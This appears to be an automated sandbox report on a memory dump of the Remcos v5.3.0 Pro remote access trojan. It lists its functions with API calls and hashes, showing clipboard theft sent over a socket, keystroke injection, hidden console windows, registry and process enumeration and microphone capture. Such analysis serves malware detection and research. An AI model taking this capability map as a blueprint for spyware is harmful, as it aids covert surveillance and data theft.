String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
Instruction ID: 168133726737647697de9464e1352de8b88ccec17f31199f7234808c5344e971
Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
Instruction Fuzzy Hash: 3E11BF726143019F8710BB7AAC499AB77EDAB85A11B00097FFC56C2250FB60D505CBA6

Function 0041BEB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00474358), ref: 0041BEB9
GetConsoleWindow.KERNEL32 ref: 0041BEBF
ShowWindow.USER32(00000000,00000000), ref: 0041BED2
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7

Strings

CONOUT$, xrefs: 0041BEE5
5.3.0 Pro, xrefs: 0041BF20
Remcos v, xrefs: 0041BF12

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Console$Window$AllocOutputShow
String ID: Remcos v$5.3.0 Pro$CONOUT$
API String ID: 4067487056-2527699604
Opcode ID: 7e766a7ea71f6337ac7c99c6c4a9d326f92e5ce4ebb09789323ae5cba05f4821
Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
Opcode Fuzzy Hash: 7e766a7ea71f6337ac7c99c6c4a9d326f92e5ce4ebb09789323ae5cba05f4821
Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D

Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
__alloca_probe_16.LIBCMT ref: 004499E2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
__alloca_probe_16.LIBCMT ref: 00449AC7
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
__freea.LIBCMT ref: 00449B37

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31

__freea.LIBCMT ref: 00449B40
__freea.LIBCMT ref: 00449B65

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
Opcode Fuzzy Hash: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668

Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32 ref: 00418B08
SendInput.USER32(00000001,?,0000001C), ref: 00418B30
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
SendInput.USER32(00000001,?,0000001C), ref: 00418BFF

Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InputSend$Virtual
String ID:
API String ID: 1167301434-0
Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB

Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00415A46
EmptyClipboard.USER32 ref: 00415A54
CloseClipboard.USER32 ref: 00415A5A
OpenClipboard.USER32 ref: 00415A61
GetClipboardData.USER32(0000000D), ref: 00415A71
GlobalLock.KERNEL32(00000000), ref: 00415A7A
GlobalUnlock.KERNEL32(00000000), ref: 00415A83
CloseClipboard.USER32 ref: 00415A89

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: f412d2494a176d703804afa92b4c85eb52b662b2185bd8d2a719052f4d33ae52
Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
Opcode Fuzzy Hash: f412d2494a176d703804afa92b4c85eb52b662b2185bd8d2a719052f4d33ae52
Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A

Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00447EBC
_free.LIBCMT ref: 00447EE0
_free.LIBCMT ref: 00448067
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
_free.LIBCMT ref: 00448233

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
Opcode Fuzzy Hash: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758

Function 024B80A1 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B8123
_free.LIBCMT ref: 024B8147
_free.LIBCMT ref: 024B82CE
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 024B82E0
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 024B8358
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 024B8385
_free.LIBCMT ref: 024B849A

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
Instruction ID: 15a28b8fc6a4db3d7ff25c5be9783fbcc05d17a9c0321b5ebfe35ceac45d2905
Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
Instruction Fuzzy Hash: 22C10471904205AFDB269F69DC40BEABBBEEF42350F1445AFD4849B251E7319E42CB70

Function 024C2D91 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,024C306A,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 024C2E3D
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,024C306A,00000000,00000000,?,00000001,?,?,?,?), ref: 024C2EC0
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,024C306A,?,024C306A,00000000,00000000,?,00000001,?,?,?,?), ref: 024C2F53
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,024C306A,00000000,00000000,?,00000001,?,?,?,?), ref: 024C2F6A

Part of subcall function 024B6D66: RtlAllocateHeap.NTDLL(00000000,024A468A,?), ref: 024B6D98

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,024C306A,00000000,00000000,?,00000001,?,?,?,?), ref: 024C2FE6
__freea.LIBCMT ref: 024C3011
__freea.LIBCMT ref: 024C301D

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 3bf6bddb58e2c22eb2473489dc4132bdb19f64c0de1c03d6ae40a4dd9e1f8fb6
Instruction ID: 10b299cb835d247a641758e8fdedbdcd624d9e619850a37bef64f67a800130a2
Opcode Fuzzy Hash: 3bf6bddb58e2c22eb2473489dc4132bdb19f64c0de1c03d6ae40a4dd9e1f8fb6
Instruction Fuzzy Hash: 3591B37AE002169ADB61CF69D840EEFBBB5AF09714F24416FEC05E7240D7B5D880CB60

Function 02483C2E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

udp, xrefs: 02483D68

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: udp
API String ID: 0-4243565622
Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
Instruction ID: 60229e247e06a7bdbaf6a809937730ab454453fd23dbba36135f0c669f24fce4
Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
Instruction Fuzzy Hash: FB718A326283528FDB25AE19C48463FBEE4AF84B49F0445AFFC8597351E774C985CB82

Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F875
_free.LIBCMT ref: 0044F883
_free.LIBCMT ref: 0044F9B1
_free.LIBCMT ref: 0044F9BC

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59

Function 024BFA6D Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024BFADC
_free.LIBCMT ref: 024BFAEA
_free.LIBCMT ref: 024BFC18
_free.LIBCMT ref: 024BFC23

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
Instruction ID: f7ac7ec5bd2afe4d71257ac00065ef8a8902a84889b1a065894c40f5983ca31b
Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
Instruction Fuzzy Hash: BF61CF71900209AFDB22CF69CC41BDABBFAEF09710F15006BE848EB641E7709985CB60

Function 02480D80 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02480820: SetLastError.KERNEL32(0000000D,02480D9F,?,00000000), ref: 02480826

GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02480D7C), ref: 02480E2B
GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 02480E91
RtlAllocateHeap.NTDLL(00000000), ref: 02480E98
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02480FA6
SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02480D7C), ref: 02480FD0

Strings

A, xrefs: 02480ED8

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
String ID: A
API String ID: 4001361727-520424720
Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
Instruction ID: 52a5dd64dcffb6dae882690eaa58274350c3fbb9d8a00034ff1446813e1a9ec8
Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
Instruction Fuzzy Hash: F761B2712312019BD710BF26C980B6F7BE5BF84744F04A02AFE068B781E7B4E499CB95

Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31

_free.LIBCMT ref: 00444086
_free.LIBCMT ref: 0044409D
_free.LIBCMT ref: 004440BC
_free.LIBCMT ref: 004440D7
_free.LIBCMT ref: 004440EE

Strings

J7D, xrefs: 00443FAB, 0044412D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: J7D
API String ID: 3033488037-1677391033
Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88

Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
__fassign.LIBCMT ref: 0044A180
__fassign.LIBCMT ref: 0044A19B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A

Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00455AF9

Strings

HE, xrefs: 00455AC0
HE, xrefs: 00455A1D, 00455B0E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free
String ID: HE$HE
API String ID: 269201875-1978648262
Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA

Function 024BA32A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,024BAA9F,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 024BA36C
__fassign.LIBCMT ref: 024BA3E7
__fassign.LIBCMT ref: 024BA402
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 024BA428
WriteFile.KERNEL32(?,FF8BC35D,00000000,024BAA9F,00000000,?,?,?,?,?,?,?,?,?,024BAA9F,?), ref: 024BA447
WriteFile.KERNEL32(?,?,00000001,024BAA9F,00000000,?,?,?,?,?,?,?,?,?,024BAA9F,?), ref: 024BA480

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d742a0ed7e7f80d5daee9f90daca0257aad30d4fad8407fa3c2509fb5468b32f
Instruction ID: f96f9c74b85dffcf4e4d75a743e75345e7e0d258317c1407ed277e12ae065b9e
Opcode Fuzzy Hash: d742a0ed7e7f80d5daee9f90daca0257aad30d4fad8407fa3c2509fb5468b32f
Instruction Fuzzy Hash: 4451D270E00219AFCB11CFA8DC85AEEBBF9EF09310F14456BE959E7291E7709941CB60

Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1

Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31

Strings

DG, xrefs: 00412CF8
>G, xrefs: 00412CF0
DG, xrefs: 00412DFF
TUFTUF, xrefs: 00412E2D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: TUFTUF$>G$DG$DG
API String ID: 3114080316-344394840
Opcode ID: 63f19c61dd7ad954783f3cee141738282da16387cf3394416b1f69b5b02384e0
Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
Opcode Fuzzy Hash: 63f19c61dd7ad954783f3cee141738282da16387cf3394416b1f69b5b02384e0
Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE

Function 0247E90A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0248B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0248A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0248B3D3
Part of subcall function 0248B3C2: IsWow64Process.KERNEL32(00000000,?,?,0248A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0248B3DA

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0247E928
Process32FirstW.KERNEL32(00000000,?), ref: 0247E94C
Process32NextW.KERNEL32(00000000,0000022C), ref: 0247E95B
CloseHandle.KERNEL32(00000000), ref: 0247EB12

Part of subcall function 0248B3EE: OpenProcess.KERNEL32(00000400,00000000), ref: 0248B403
Part of subcall function 0248B3EE: IsWow64Process.KERNEL32(00000000,?), ref: 0248B40E

Part of subcall function 0248B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0248B5FC
Part of subcall function 0248B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0248B60F

Process32NextW.KERNEL32(00000000,0000022C), ref: 0247EB03

Strings

PgF, xrefs: 0247E969

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID: PgF
API String ID: 2180151492-654241383
Opcode ID: 4103c74ef064f91666f8864adad10e095dbae6404165e6ea80ccaa02d20916fc
Instruction ID: f5d6c07bef953888b4cc0892e836d175961aa5dfccad4c21e320578b9836e6b7
Opcode Fuzzy Hash: 4103c74ef064f91666f8864adad10e095dbae6404165e6ea80ccaa02d20916fc
Instruction Fuzzy Hash: 7C4110312082419BC366FB22DC50AEF73EAFF94300F50456FE95A96190EF709A4ACE56

Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00437AAB
___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
_ValidateLocalCookies.LIBCMT ref: 00437B41
__IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
_ValidateLocalCookies.LIBCMT ref: 00437BC1

Strings

csm, xrefs: 00437B56

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95

Function 02471CF5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 02471D3A

Part of subcall function 02471E4F: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02471EBB

waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 02471DEC
waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 02471E2A
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 02471E39

Strings

`=G, xrefs: 02471D6B
x=G, xrefs: 02471DF2

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: `=G$x=G
API String ID: 3809562944-3004145341
Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
Instruction ID: 11b1bd0e9c6dfcadc6d9eebb662e74857784092a98334b70e715e928413d08d3
Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
Instruction Fuzzy Hash: 58317E315043409FC724EF26DC54ADE77AAFB84300F00483EE969922B4EFB09A49CF66

Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

